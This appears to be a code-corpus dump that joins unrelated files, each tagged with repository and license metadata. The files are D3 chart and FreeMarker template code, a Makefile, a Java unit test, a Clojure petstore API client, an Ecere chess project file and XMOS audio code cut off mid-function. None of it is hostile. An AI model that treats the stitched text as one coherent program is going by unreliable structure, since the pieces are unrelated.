var tbl = document.createElement('table');
tbl.style.width = '100%';
// tbl.style.height = '100%';
tbl.setAttribute('border', border);
if(backgroundColor) tbl.style.backgroundColor = backgroundColor;
if (colWidths) {
for (var i = 0; i < colWidths.length; i++) {
var col = document.createElement('col');
col.setAttribute('width', colWidths[i] + '%');
tbl.appendChild(col);
}
}
if (header) {
var theader = document.createElement('thead');
var headerRow = document.createElement('tr');
if(headerColor) headerRow.style.backgroundColor = headerColor;
for (var i = 0; i < header.length; i++) {
var headerd = document.createElement('th');
headerd.style.padding = padTop + 'px ' + padRight + 'px ' + padBottom + 'px ' + padLeft + 'px';
headerd.appendChild(document.createTextNode(header[i]));
headerRow.appendChild(headerd);
}
tbl.appendChild(headerRow);
}
//Add content:
if (values) {
var tbdy = document.createElement('tbody');
for (var i = 0; i < values.length; i++) {
var tr = document.createElement('tr');
for (var j = 0; j < values[i].length; j++) {
var td = document.createElement('td');
td.style.padding = padTop + 'px ' + padRight + 'px ' + padBottom + 'px ' + padLeft + 'px';
td.appendChild(document.createTextNode(values[i][j]));
tr.appendChild(td);
}
tbdy.appendChild(tr);
}
tbl.appendChild(tbdy);
}
appendTo.append(tbl);
}
/** Create + add line chart with multiple lines, (optional) title, (optional) series names.
* appendTo: jquery selector of object to append to. MUST HAVE ID
* */
function createLineChart(chartObj, appendTo, chartWidth, chartHeight) {
//Expect: RenderableComponentLineChart
var title = chartObj['title'];
var xData = chartObj['x'];
var yData = chartObj['y'];
var mTop = chartObj['marginTop'];
var mBottom = chartObj['marginBottom'];
var mLeft = chartObj['marginLeft'];
var mRight = chartObj['marginRight'];
var removeAxisHorizontal = chartObj['removeAxisHorizontal'];
var seriesNames = chartObj['seriesNames'];
var withLegend = chartObj['legend'];
var nSeries = (!xData ? 0 : xData.length);
// Set the dimensions of the canvas / graph
var margin = {top: mTop, right: mRight, bottom: mBottom, left: mLeft},
width = chartWidth - margin.left - margin.right,
height = chartHeight - margin.top - margin.bottom;
// Set the ranges
var xScale = d3.scale.linear().range([0, width]);
var yScale = d3.scale.linear().range([height, 0]);
// Define the axes
var xAxis = d3.svg.axis().scale(xScale)
.innerTickSize(-height) //used as grid line
.orient("bottom").ticks(5);
if(removeAxisHorizontal == true){
xAxis.tickValues([]);
}
var yAxis = d3.svg.axis().scale(yScale)
.innerTickSize(-width) //used as grid line
.orient("left").ticks(5);
// Define the line
var valueline = d3.svg.line()
.x(function (d) {
return xScale(d.xPos);
})
.y(function (d) {
return yScale(d.yPos);
});
// Adds the svg canvas
var svg = d3.select("#" + appendTo.attr("id"))
.append("svg")
.attr("width", width + margin.left + margin.right)
.attr("height", height + margin.top + margin.bottom)
.attr("padding", "20px")
.append("g")
.attr("transform",
"translate(" + margin.left + "," + margin.top + ")");
// Scale the range of the chart
var xMin = Number.MAX_VALUE;
var xMax = -Number.MAX_VALUE;
var yMax = -Number.MAX_VALUE;
var yMin = Number.MAX_VALUE;
for (var i = 0; i < nSeries; i++) {
var xV = xData[i];
var yV = yData[i];
var thisMin = d3.min(xV);
var thisMax = d3.max(xV);
var thisMaxY = d3.max(yV);
var thisMinY = d3.min(yV);
if (thisMin < xMin) xMin = thisMin;
if (thisMax > xMax) xMax = thisMax;
if (thisMaxY > yMax) yMax = thisMaxY;
if (thisMinY < yMin) yMin = thisMinY;
}
if (yMin > 0) yMin = 0;
xScale.domain([xMin, xMax]);
yScale.domain([yMin, yMax]);
// Add the valueline path.
var color = d3.scale.category10();
for (var i = 0; i < nSeries; i++) {
var xVals = xData[i];
var yVals = yData[i];
var data = xVals.map(function (d, i) {
return {'xPos': xVals[i], 'yPos': yVals[i]};
});
svg.append("path")
.attr("class", "line")
.style("stroke", color(i))
.attr("d", valueline(data));
}
// Add the X Axis
svg.append("g")
.attr("class", "x axis")
.attr("transform", "translate(0," + height + ")")
.call(xAxis);
// Add the Y Axis
svg.append("g")
.attr("class", "y axis")
.call(yAxis);
//Add legend (if present)
if (seriesNames && withLegend == true) {
var legendSpace = width / i;
for (var i = 0; i < nSeries; i++) {
var values = xData[i];
var yValues = yData[i];
var lastX = values[values.length - 1];
var lastY = yValues[yValues.length - 1];
var toDisplay;
if (!lastX || !lastY) toDisplay = seriesNames[i] + " (no data)";
else toDisplay = seriesNames[i] + " (" + lastX.toPrecision(5) + "," + lastY.toPrecision(5) + ")";
svg.append("text")
.attr("x", (legendSpace / 2) + i * legendSpace) // spacing
.attr("y", height + (margin.bottom / 2) + 5)
.attr("class", "legend") // style the legend
.style("fill", color(i))
.text(toDisplay);
}
}
//Add title (if present)
if (title) {
svg.append("text")
.attr("x", (width / 2))
.attr("y", 0 - ((margin.top - 30) / 2))
.attr("text-anchor", "middle")
.style("font-size", "13px")
.style("text-decoration", "underline")
.text(title);
}
}
/** Create + add histogram
* */
function createHistogram(chartObj, appendTo, chartWidth, chartHeight) {
//Expect: RenderableComponentHistogram
var title = chartObj['title'];
var lowerBounds = chartObj['lowerBounds'];
var upperBounds = chartObj['upperBounds'];
var yValues = chartObj['yvalues'];
var mTop = chartObj['marginTop'];
var mBottom = chartObj['marginBottom'];
var mLeft = chartObj['marginLeft'];
var mRight = chartObj['marginRight'];
// var removeAxisHorizontal = chartObj['removeAxisHorizontal'];
// Set the dimensions of the canvas / graph
var margin = {top: mTop, right: mRight, bottom: mBottom, left: mLeft},
width = chartWidth - margin.left - margin.right,
height = chartHeight - margin.top - margin.bottom;
// Set the ranges
var xScale = d3.scale.linear().range([0, width]);
var yScale = d3.scale.linear().range([height, 0]);
var xMin = Number.MAX_VALUE;
var xMax = -Number.MAX_VALUE;
var yMax = -Number.MAX_VALUE;
for (var i = 0; i < lowerBounds.length; i++) {
if (lowerBounds[i] < xMin) xMin = lowerBounds[i];
if (upperBounds[i] > xMax) xMax = upperBounds[i];
if (yValues[i] > yMax) yMax = yValues[i];
}
// Define the axes
var xAxis = d3.scale.linear()
.domain([xMin, xMax])
.range([0, width]);
var yAxis = d3.scale.linear()
.domain([0, yMax])
.range([height, 0]);
// Set up the data:
var data = lowerBounds.map(function (d, i) {
return {'width': upperBounds[i] - lowerBounds[i], 'height': yValues[i], 'offset': lowerBounds[i]};
});
// Adds the svg canvas
var svg = d3.select("#" + appendTo.attr("id"))
.append("svg")
.attr("width", width + margin.left + margin.right)
.attr("height", height + margin.top + margin.bottom)
.attr("padding", "20px")
.append("g")
.attr("transform",
"translate(" + margin.left + "," + margin.top + ")");
// Add the bins.
svg.selectAll(".bin")
.data(data)
.enter().append("rect")
.attr("class", "bin")
.attr("x", function(d) { return xAxis(d.offset); })
.attr("width", function(d) { return xAxis(xMin + d.width) - 1; })
.attr("y", function(d) { return yAxis(d.height); })
.attr("height", function(d) { return height - yAxis(d.height); });
svg.append("g")
.attr("class", "x axis")
.attr("transform", "translate(0," + height + ")")
.call(d3.svg.axis()
.scale(xAxis)
.orient("bottom"));
svg.append("g")
.attr("class", "y axis")
.call(d3.svg.axis()
.scale(yAxis)
.orient("left"));
//Add title (if present)
if (title) {
svg.append("text")
.attr("x", (width / 2))
.attr("y", 0 - ((margin.top - 30) / 2))
.attr("text-anchor", "middle")
.style("font-size", "13px")
.style("text-decoration", "underline")
.text(title);
}
}
</script>
<table style="width: 100%; padding: 5px" class="hd">
<tbody>
<tr>
<td style="width:15px; height:35px; padding: 4px 15px;">
<td>Data Analysis</td>
<td style="text-align:right">${datetime}</td>
<td style="width:15px; height:35px; padding: 4px 15px;">
</tr>
</tbody>
</table>
<div style="width:1400px; margin:0 auto; border:0px" id="outerdiv">
<div style="width:100%; padding-top:20px" id="maindiv">
<div style="width:100%; height:20px"></div>
<div style="width:100%;" class="sectionheader">
<div style="padding-left:40px; padding-top:3px; padding-bottom:3px">
Summary Column Analysis
</div>
</div>
<div style="width:100%; height:auto" align="center" id="tablediv">
</div>
<div style="width:100%; height:20px"></div>
<div style="width:100%;" class="sectionheader">
<div style="padding-left:40px; padding-top:3px; padding-bottom:3px">
Numerical Column Histograms
</div>
</div>
<div style="width:100%; height:auto" align="center" id="histogramdiv">
</div>
</div>
</div>
<#list divs as div>
<div id="${div.id}" style="display:none">
${div.content}
</div>
</#list>
</body>
</html> | FreeMarker | 4 | rghwer/testdocs | datavec/datavec-api/src/main/resources/templates/analysis.ftl | [
"Apache-2.0"
] |
include ../tools.mk
# only-windows-gnu
all:
$(RUSTC) foo.rs
# FIXME: we should make sure __stdcall calling convention is used here
# but that only works with LLD right now
nm -g "$(call IMPLIB,foo)" | $(CGREP) bar
| Makefile | 3 | Eric-Arellano/rust | src/test/run-make-fulldeps/mingw-export-call-convention/Makefile | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
package com.baeldung.algorithms.enumstatemachine;
import static org.junit.Assert.assertEquals;
import org.junit.Test;
public class LeaveRequestStateUnitTest {
@Test
public void givenLeaveRequest_whenStateEscalated_thenResponsibleIsTeamLeader() {
LeaveRequestState state = LeaveRequestState.Escalated;
assertEquals(state.responsiblePerson(), "Team Leader");
}
@Test
public void givenLeaveRequest_whenStateApproved_thenResponsibleIsDepartmentManager() {
LeaveRequestState state = LeaveRequestState.Approved;
assertEquals(state.responsiblePerson(), "Department Manager");
}
@Test
public void givenLeaveRequest_whenNextStateIsCalled_thenStateIsChanged() {
LeaveRequestState state = LeaveRequestState.Submitted;
state = state.nextState();
assertEquals(state, LeaveRequestState.Escalated);
state = state.nextState();
assertEquals(state, LeaveRequestState.Approved);
state = state.nextState();
assertEquals(state, LeaveRequestState.Approved);
}
}
| Java | 3 | DBatOWL/tutorials | algorithms-miscellaneous-3/src/test/java/com/baeldung/algorithms/enumstatemachine/LeaveRequestStateUnitTest.java | [
"MIT"
] |
(ns open-api-petstore.api.pet
(:require [open-api-petstore.core :refer [call-api check-required-params with-collection-format *api-context*]]
[clojure.spec.alpha :as s]
[spec-tools.core :as st]
[orchestra.core :refer [defn-spec]]
[open-api-petstore.specs.tag :refer :all]
[open-api-petstore.specs.category :refer :all]
[open-api-petstore.specs.user :refer :all]
[open-api-petstore.specs.pet :refer :all]
[open-api-petstore.specs.order :refer :all]
)
(:import (java.io File)))
(defn-spec add-pet-with-http-info any?
"Add a new pet to the store"
([] (add-pet-with-http-info nil))
([{:keys [pet]} (s/map-of keyword? any?)]
(call-api "/pet" :post
{:path-params {}
:header-params {}
:query-params {}
:form-params {}
:body-param pet
:content-types ["application/json" "application/xml"]
:accepts []
:auth-names ["petstore_auth"]})))
(defn-spec add-pet any?
"Add a new pet to the store"
([] (add-pet nil))
([optional-params any?]
(let [res (:data (add-pet-with-http-info optional-params))]
(if (:decode-models *api-context*)
(st/decode any? res st/string-transformer)
res))))
(defn-spec delete-pet-with-http-info any?
"Deletes a pet"
([petId int?, ] (delete-pet-with-http-info petId nil))
([petId int?, {:keys [api_key]} (s/map-of keyword? any?)]
(check-required-params petId)
(call-api "/pet/{petId}" :delete
{:path-params {"petId" petId }
:header-params {"api_key" api_key }
:query-params {}
:form-params {}
:content-types []
:accepts []
:auth-names ["petstore_auth"]})))
(defn-spec delete-pet any?
"Deletes a pet"
([petId int?, ] (delete-pet petId nil))
([petId int?, optional-params any?]
(let [res (:data (delete-pet-with-http-info petId optional-params))]
(if (:decode-models *api-context*)
(st/decode any? res st/string-transformer)
res))))
(defn-spec find-pets-by-status-with-http-info any?
"Finds Pets by status
Multiple status values can be provided with comma separated strings"
([] (find-pets-by-status-with-http-info nil))
([{:keys [status]} (s/map-of keyword? any?)]
(call-api "/pet/findByStatus" :get
{:path-params {}
:header-params {}
:query-params {"status" (with-collection-format status :multi) }
:form-params {}
:content-types []
:accepts ["application/json" "application/xml"]
:auth-names ["petstore_auth"]})))
(defn-spec find-pets-by-status (s/coll-of pet-spec)
"Finds Pets by status
Multiple status values can be provided with comma separated strings"
([] (find-pets-by-status nil))
([optional-params any?]
(let [res (:data (find-pets-by-status-with-http-info optional-params))]
(if (:decode-models *api-context*)
(st/decode (s/coll-of pet-spec) res st/string-transformer)
res))))
(defn-spec find-pets-by-tags-with-http-info any?
"Finds Pets by tags
Multiple tags can be provided with comma separated strings. Use tag1, tag2, tag3 for testing."
([] (find-pets-by-tags-with-http-info nil))
([{:keys [tags]} (s/map-of keyword? any?)]
(call-api "/pet/findByTags" :get
{:path-params {}
:header-params {}
:query-params {"tags" (with-collection-format tags :multi) }
:form-params {}
:content-types []
:accepts ["application/json" "application/xml"]
:auth-names ["petstore_auth"]})))
(defn-spec find-pets-by-tags (s/coll-of pet-spec)
"Finds Pets by tags
Multiple tags can be provided with comma separated strings. Use tag1, tag2, tag3 for testing."
([] (find-pets-by-tags nil))
([optional-params any?]
(let [res (:data (find-pets-by-tags-with-http-info optional-params))]
(if (:decode-models *api-context*)
(st/decode (s/coll-of pet-spec) res st/string-transformer)
res))))
(defn-spec get-pet-by-id-with-http-info any?
"Find pet by ID
Returns a pet when ID < 10. ID > 10 or nonintegers will simulate API error conditions"
[petId int?]
(check-required-params petId)
(call-api "/pet/{petId}" :get
{:path-params {"petId" petId }
:header-params {}
:query-params {}
:form-params {}
:content-types []
:accepts ["application/json" "application/xml"]
:auth-names ["api_key" "petstore_auth"]}))
(defn-spec get-pet-by-id pet-spec
"Find pet by ID
Returns a pet when ID < 10. ID > 10 or nonintegers will simulate API error conditions"
[petId int?]
(let [res (:data (get-pet-by-id-with-http-info petId))]
(if (:decode-models *api-context*)
(st/decode pet-spec res st/string-transformer)
res)))
(defn-spec update-pet-with-http-info any?
"Update an existing pet"
([] (update-pet-with-http-info nil))
([{:keys [pet]} (s/map-of keyword? any?)]
(call-api "/pet" :put
{:path-params {}
:header-params {}
:query-params {}
:form-params {}
:body-param pet
:content-types ["application/json" "application/xml"]
:accepts []
:auth-names ["petstore_auth"]})))
(defn-spec update-pet any?
"Update an existing pet"
([] (update-pet nil))
([optional-params any?]
(let [res (:data (update-pet-with-http-info optional-params))]
(if (:decode-models *api-context*)
(st/decode any? res st/string-transformer)
res))))
(defn-spec update-pet-with-form-with-http-info any?
"Updates a pet in the store with form data"
([petId string?, ] (update-pet-with-form-with-http-info petId nil))
([petId string?, {:keys [name status]} (s/map-of keyword? any?)]
(check-required-params petId)
(call-api "/pet/{petId}" :post
{:path-params {"petId" petId }
:header-params {}
:query-params {}
:form-params {"name" name "status" status }
:content-types ["application/x-www-form-urlencoded"]
:accepts []
:auth-names ["petstore_auth"]})))
(defn-spec update-pet-with-form any?
"Updates a pet in the store with form data"
([petId string?, ] (update-pet-with-form petId nil))
([petId string?, optional-params any?]
(let [res (:data (update-pet-with-form-with-http-info petId optional-params))]
(if (:decode-models *api-context*)
(st/decode any? res st/string-transformer)
res))))
(defn-spec upload-file-with-http-info any?
"uploads an image"
([petId int?, ] (upload-file-with-http-info petId nil))
([petId int?, {:keys [additionalMetadata ^File file]} (s/map-of keyword? any?)]
(check-required-params petId)
(call-api "/pet/{petId}/uploadImage" :post
{:path-params {"petId" petId }
:header-params {}
:query-params {}
:form-params {"additionalMetadata" additionalMetadata "file" file }
:content-types ["multipart/form-data"]
:accepts []
:auth-names ["petstore_auth"]})))
(defn-spec upload-file any?
"uploads an image"
([petId int?, ] (upload-file petId nil))
([petId int?, optional-params any?]
(let [res (:data (upload-file-with-http-info petId optional-params))]
(if (:decode-models *api-context*)
(st/decode any? res st/string-transformer)
res))))
| Clojure | 5 | MalcolmScoffable/openapi-generator | samples/client/petstore/clojure/src/open_api_petstore/api/pet.clj | [
"Apache-2.0"
] |
{
"Version" : 0.2,
"ModuleName" : "Chess",
"Options" : {
"TargetType" : "Executable",
"TargetFileName" : "chess",
"Libraries" : [
"ecere"
]
},
"Configurations" : [
{
"Name" : "Debug",
"Options" : {
"Debug" : true,
"Console" : true
}
},
{
"Name" : "Release",
"Options" : {
"Optimization" : "Speed"
}
},
{
"Name" : "MemoryGuard",
"Options" : {
"Debug" : true,
"MemoryGuard" : true,
"Console" : true
}
},
{
"Name" : "Android",
"Options" : {
"Optimization" : "Speed",
"PreprocessorDefinitions" : [
"HIGH_DPI"
],
"TargetType" : "SharedLibrary",
"TargetFileName" : "Chess",
"FastMath" : true,
"PostbuildCommands" : [
"$(call mkdir,$(OBJ)classes)",
"$(call mkdir,$(OBJ)apk/lib/arm64-v8a)",
"javac -verbose -d $(OBJ)/classes -classpath /android/platforms/android-28/android.jar:$(OBJ) -sourcepath . android/$(MODULE).java",
"dx --dex --verbose --output=$(OBJ)apk/classes.dex $(OBJ)classes",
"$(call cp,../../../ecere/obj/android.linux.$(COMPILER)/libecere.so.0.44,$(OBJ)apk/lib/arm64-v8a/libecere.so)",
"$(call cp,$(TARGET),$(OBJ)apk/lib/arm64-v8a)",
"aapt package -v -f -m -M android/AndroidManifest.xml -F $(OBJ)$(MODULE)-unsigned.apk -I /android/platforms/android-28/android.jar -S android/res $(OBJ)apk",
"jarsigner -storepass android -sigalg MD5withRSA -digestalg SHA1 $(OBJ)$(MODULE)-unsigned.apk androiddebugkey -keystore /android/debug.keystore -signedjar $(OBJ)$(MODULE).apk",
"adb uninstall com.ecere.$(MODULE)",
"adb install $(OBJ)$(MODULE).apk",
"adb shell am start -a android.intent.action.MAIN -n com.ecere.$(MODULE)/.$(MODULE)"
]
}
},
{
"Name" : "Emscripten",
"Options" : {
"Optimization" : "Speed",
"PreprocessorDefinitions" : [
"ECERE_STATIC",
"CHESS_NONET"
],
"TargetFileName" : "chess.html",
"Libraries" : [
"ecereStatic",
"z",
"freetype",
"jpeg",
"png"
],
"LibraryDirs" : [
"../../../ecere/obj/emscripten.linux.emscripten"
],
"FastMath" : true
}
}
],
"Files" : [
{
"Folder" : "src",
"Files" : [
"about.ec",
"ai.ec",
"chess.ec",
"chess2D.ec",
"chess3D.ec",
"chessutils.ec",
"connect.ec",
"promotion.ec"
]
},
{
"Folder" : "android",
"Files" : [
{
"Folder" : "res",
"Files" : [
{
"Folder" : "drawable",
"Files" : [
{
"FileName" : "icon.png",
"Options" : {
"ExcludeFromBuild" : true
}
}
]
},
{
"Folder" : "drawable-xhdpi",
"Files" : [
"icon.png"
]
},
{
"Folder" : "values",
"Files" : [
"strings.xml"
]
}
]
},
"AndroidManifest.xml",
"Chess.java"
]
}
],
"ResourcesPath" : "res",
"Resources" : [
{
"Folder" : "ecere",
"Files" : [
{
"Folder" : "actions",
"Files" : [
"../../../ecere/res/actions/clean.png",
"../../../ecere/res/actions/docNew.png",
"../../../ecere/res/actions/docSave.png",
"../../../ecere/res/actions/editFind.png",
"../../../ecere/res/actions/folderNew.png",
"../../../ecere/res/actions/goDown.png",
"../../../ecere/res/actions/goHome.png",
"../../../ecere/res/actions/goNext.png",
"../../../ecere/res/actions/goPrevious.png",
"../../../ecere/res/actions/goUp.png",
"../../../ecere/res/actions/listAdd.png",
"../../../ecere/res/actions/listRemove.png",
"../../../ecere/res/actions/viewRefresh.png",
"../../../ecere/res/actions/windowNew.png"
]
},
{
"Folder" : "aqua",
"Files" : [
"../../../ecere/res/aqua/back.png",
"../../../ecere/res/aqua/down.png",
"../../../ecere/res/aqua/downLeft.png",
"../../../ecere/res/aqua/downMiddle.png",
"../../../ecere/res/aqua/downRight.png",
"../../../ecere/res/aqua/sDown.png",
"../../../ecere/res/aqua/sUp.png",
"../../../ecere/res/aqua/up.png",
"../../../ecere/res/aqua/upLeft.png",
"../../../ecere/res/aqua/upMiddle.png",
"../../../ecere/res/aqua/upRight.png"
]
},
{
"Folder" : "constructs",
"Files" : [
"../../../ecere/res/constructs/class.png",
"../../../ecere/res/constructs/data.png",
"../../../ecere/res/constructs/dataPrivate.png",
"../../../ecere/res/constructs/dataType.png",
"../../../ecere/res/constructs/enum.png",
"../../../ecere/res/constructs/enumValue.png",
"../../../ecere/res/constructs/event.png",
"../../../ecere/res/constructs/library.png",
"../../../ecere/res/constructs/method.png",
"../../../ecere/res/constructs/methodPrivate.png",
"../../../ecere/res/constructs/namespace.png",
"../../../ecere/res/constructs/property.png",
"../../../ecere/res/constructs/propertyPrivate.png"
]
},
{
"Folder" : "controls",
"Files" : [
"../../../ecere/res/controls/button.png",
"../../../ecere/res/controls/calendar.png",
"../../../ecere/res/controls/checkBox.png",
"../../../ecere/res/controls/dataBox.png",
"../../../ecere/res/controls/dropBox.png",
"../../../ecere/res/controls/editBox.png",
"../../../ecere/res/controls/groupBox.png",
"../../../ecere/res/controls/label.png",
"../../../ecere/res/controls/listBox.png",
"../../../ecere/res/controls/menu.png",
"../../../ecere/res/controls/optionBox.png",
"../../../ecere/res/controls/progressBar.png",
"../../../ecere/res/controls/scrollBarHorizontal.png",
"../../../ecere/res/controls/scrollBarVertical.png",
"../../../ecere/res/controls/statusBar.png"
]
},
{
"Folder" : "cursors",
"Files" : [
"../../../ecere/res/cursors/arrow.png",
"../../../ecere/res/cursors/cross.png",
"../../../ecere/res/cursors/iBeam.png",
"../../../ecere/res/cursors/move.png",
"../../../ecere/res/cursors/sizeEastWest.png",
"../../../ecere/res/cursors/sizeNortEastSouthWest.png",
"../../../ecere/res/cursors/sizeNorthSouth.png",
"../../../ecere/res/cursors/sizeNortWestSouthEast.png"
]
},
{
"Folder" : "devices",
"Files" : [
"../../../ecere/res/devices/computer.png",
"../../../ecere/res/devices/driveHardDisk.png",
"../../../ecere/res/devices/driveRemovableMedia.png",
"../../../ecere/res/devices/mediaFloppy.png",
"../../../ecere/res/devices/mediaOptical.png"
]
},
{
"Folder" : "elements",
"Files" : [
"../../../ecere/res/elements/areaClose.png",
"../../../ecere/res/elements/areaMaximize.png",
"../../../ecere/res/elements/areaMinimize.png",
"../../../ecere/res/elements/areaRestore.png",
"../../../ecere/res/elements/arrowDown.png",
"../../../ecere/res/elements/arrowLeft.png",
"../../../ecere/res/elements/arrowRight.png",
"../../../ecere/res/elements/arrowUp.png",
"../../../ecere/res/elements/checkBox.png",
"../../../ecere/res/elements/checkBoxChecked.png",
"../../../ecere/res/elements/checkBoxDisabled.png",
"../../../ecere/res/elements/checkBoxDisabledChecked.png",
"../../../ecere/res/elements/optionBoxDisabled.png",
"../../../ecere/res/elements/optionBoxDisabledSelected.png",
"../../../ecere/res/elements/optionBoxDown.png",
"../../../ecere/res/elements/optionBoxSelectedDown.png",
"../../../ecere/res/elements/optionBoxSelectedUp.png",
"../../../ecere/res/elements/optionBoxUp.png",
"../../../ecere/res/elements/orderAscending.png",
"../../../ecere/res/elements/orderCategorized.png",
"../../../ecere/res/elements/orderDescending.png"
]
},
{
"Folder" : "emblems",
"Files" : [
"../../../ecere/res/emblems/unreadable.png"
]
},
{
"Folder" : "mimeTypes",
"Files" : [
"../../../ecere/res/mimeTypes/brokenFile.png",
"../../../ecere/res/mimeTypes/file.png",
"../../../ecere/res/mimeTypes/image.png",
"../../../ecere/res/mimeTypes/package.png",
"../../../ecere/res/mimeTypes/packageOpticalDisc.png",
"../../../ecere/res/mimeTypes/packageSoftware.png",
"../../../ecere/res/mimeTypes/text.png",
"../../../ecere/res/mimeTypes/textC++Header.png",
"../../../ecere/res/mimeTypes/textC++Source.png",
"../../../ecere/res/mimeTypes/textCHeader.png",
"../../../ecere/res/mimeTypes/textCSource.png",
"../../../ecere/res/mimeTypes/textEcereHeader.png",
"../../../ecere/res/mimeTypes/textEcereProject.png",
"../../../ecere/res/mimeTypes/textEcereSource.png",
"../../../ecere/res/mimeTypes/textEcereWorkspace.png",
"../../../ecere/res/mimeTypes/textHyperTextMarkup.png"
]
},
{
"Folder" : "places",
"Files" : [
"../../../ecere/res/places/brokenFolder.png",
"../../../ecere/res/places/driveRemote.png",
"../../../ecere/res/places/folder.png",
"../../../ecere/res/places/folderRemote.png",
"../../../ecere/res/places/networkServer.png",
"../../../ecere/res/places/networkWorkgroup.png"
]
},
{
"Folder" : "status",
"Files" : [
"../../../ecere/res/status/audioVolumeHigh.png",
"../../../ecere/res/status/folderOpen.png"
]
},
{
"Folder" : "unicode",
"Files" : [
"../../../ecere/res/unicode/derivedGeneralCategoryStripped.txt"
]
},
{
"Folder" : "shaders",
"Files" : [
"../../../ecere/src/gfx/drivers/gl3/default.frag",
"../../../ecere/src/gfx/drivers/gl3/default.vert"
]
},
"$(ECERE_SDK_SRC)/ecere/res/fonts/tahoma.ttf",
"$(ECERE_SDK_SRC)/ecere/res/fonts/tahomabd.ttf"
],
"Options" : {
"ExcludeFromBuild" : true
},
"Configurations" : [
{
"Name" : "Emscripten",
"Options" : {
"ExcludeFromBuild" : false
}
}
]
},
"aboutPic.jpg",
"blackBishop.png",
"blackKing.png",
"blackKnight.png",
"blackPawn.png",
"blackQueen.png",
"blackRook.png",
"board.jpg",
"bthr.jpg",
"darkwood.jpg",
"lightwo1.jpg",
"whiteBishop.png",
"whiteKing.png",
"whiteKnight.png",
"whitePawn.png",
"whiteQueen.png",
"whiteRook.png",
"chessSet.3ds"
]
}
| Ecere Projects | 4 | N-eil/ecere-sdk | samples/games/chess/chess.epj | [
"BSD-3-Clause"
] |
/**
* @file audio.xc
* @brief XMOS L1/L2 USB 2,0 Audio Reference Design. Audio Functions.
* @author Ross Owen, XMOS Semiconductor Ltd
*
* This thread handles I2S and pars an additional SPDIF Tx thread. It forwards samples to the SPDIF Tx thread.
* Additionally this thread handles clocking and CODEC/DAC/ADC config.
**/
#include <syscall.h>
#include <platform.h>
#include <xs1.h>
#include <xclib.h>
#include <xs1_su.h>
#include "devicedefines.h"
#include "dfu_interface.h"
#include "audiohw.h"
#include "commands.h"
#include "xc_ptr.h"
#include "print.h"
/* Two buffers for ADC data to allow for DAC and ADC ports being offset */
static unsigned samplesIn_0[NUM_USB_CHAN_IN];
static unsigned samplesIn_1[I2S_CHANS_ADC];
unsigned g_adcVal = 0;
// TODO: Do we need this?
#ifdef XTA_TIMING_AUDIO
#pragma xta command "add exclusion received_command"
#pragma xta command "analyse path i2s_output_l i2s_output_r"
#pragma xta command "set required - 2000 ns"
#pragma xta command "add exclusion received_command"
#pragma xta command "add exclusion received_underflow"
#pragma xta command "add exclusion divide_1"
#pragma xta command "add exclusion deliver_return"
#pragma xta command "analyse path i2s_output_r i2s_output_l"
#pragma xta command "set required - 2000 ns"
#endif
unsigned dsdMode = DSD_MODE_OFF;
/* Master clock input */
extern port p_mclk_in;
extern clock clk_audio_mclk;
extern void device_reboot(void);
#pragma unsafe arrays
static inline unsigned DoSampleTransfer(chanend c_out, const int readBuffNo, const unsigned underflowWord)
{
outuint(c_out, underflowWord);
/* Check for sample freq change (or other command) or new samples from mixer*/
if(testct(c_out))
{
unsigned command = inct(c_out);
#pragma xta endpoint "received_command"
return command;
}
else
{
inuint(c_out);
#pragma loop unroll
for(int i = 0; i < I2S_CHANS_ADC; i++)
{
if(readBuffNo)
outuint(c_out, samplesIn_1[i]);
else
outuint(c_out, samplesIn_0[i]);
}
/* Send over the digi channels - no odd buffering required */
#pragma loop unroll
for(int i = I2S_CHANS_ADC; i < NUM_USB_CHAN_IN; i++)
{
outuint(c_out, samplesIn_0[i]);
}
}
return 0;
}
/* I2S delivery thread */
#pragma unsafe arrays
unsigned static deliver(chanend c_out, chanend ?c_spd_out, unsigned divide, unsigned curSamFreq, chanend c_pdm_pcm, chanend ?c_adc)
{
/* Since DAC and ADC buffered ports off by one sample we buffer previous ADC frame */
unsigned readBuffNo = 0;
unsigned index;
unsigned underflowWord = 0;
unsigned frameCount = 0;
unsigned command = DoSampleTransfer(c_out, readBuffNo, underflowWord);
if(command)
{
return command;
}
/* Main Audio I/O loop */
while (1)
{
{
if(frameCount == 0)
{
/* Get samples from PDM->PCM comverter */
c_pdm_pcm <: 1;
#pragma loop unroll
for(int i = 0; i < NUM_PDM_MICS; i++)
{
c_pdm_pcm :> samplesIn_0[i];
}
}
index = 0;
} // !dsdMode
{
/* Do samples transfer */
/* The below looks a bit odd but forces the compiler to inline twice */
unsigned command;
if(readBuffNo)
command = DoSampleTransfer(c_out, 1, underflowWord);
else
command = DoSampleTransfer(c_out, 0, underflowWord);
if(command)
{
return command;
}
/* Reset frame counter and flip the ADC buffer */
frameCount = 0;
readBuffNo = !readBuffNo;
}
}
#pragma xta endpoint "deliver_return"
return 0;
}
/* This function is a dummy version of the deliver thread that does not
connect to the codec ports. It is used during DFU reset. */
[[distributable]]
void DFUHandler(server interface i_dfu i, chanend ?c_user_cmd);
#pragma select handler
void testct_byref(chanend c, int &returnVal)
{
returnVal = 0;
if(testct(c))
returnVal = 1;
}
[[combinable]]
static void dummy_deliver(chanend c_out, unsigned &command)
{
int ct;
while (1)
{
select
{
/* Check for sample freq change or new samples from mixer*/
case testct_byref(c_out, ct):
if(ct)
{
unsigned command = inct(c_out);
return;
}
else
{
inuint(c_out);
#pragma loop unroll
for(int i = 0; i < NUM_USB_CHAN_IN; i++)
{
outuint(c_out, 0);
}
}
outuint(c_out, 0);
break;
}
}
}
#define SAMPLE_RATE 200000
#define NUMBER_CHANNELS 1
#define NUMBER_SAMPLES 100
#define NUMBER_WORDS ((NUMBER_SAMPLES * NUMBER_CHANNELS+1)/2)
#define SAMPLES_PER_PRINT 1
void audio(chanend c_mix_out, chanend ?c_config, chanend ?c, server interface i_dfu dfuInterface, chanend c_pdm_in)
{
unsigned curSamFreq = DEFAULT_FREQ;
unsigned curSamRes_DAC = STREAM_FORMAT_OUTPUT_1_RESOLUTION_BITS; /* Default to something reasonable */
unsigned curSamRes_ADC = STREAM_FORMAT_INPUT_1_RESOLUTION_BITS; /* Default to something reasonable - note, currently this never changes*/
unsigned command;
unsigned mClk;
unsigned divide;
unsigned firstRun = 1;
/* Clock master clock-block from master-clock port */
configure_clock_src(clk_audio_mclk, p_mclk_in);
start_clock(clk_audio_mclk);
/* Perform required CODEC/ADC/DAC initialisation */
AudioHwInit(c_config);
while(1)
{
/* Calculate what master clock we should be using */
if ((MCLK_441 % curSamFreq) == 0)
{
mClk = MCLK_441;
}
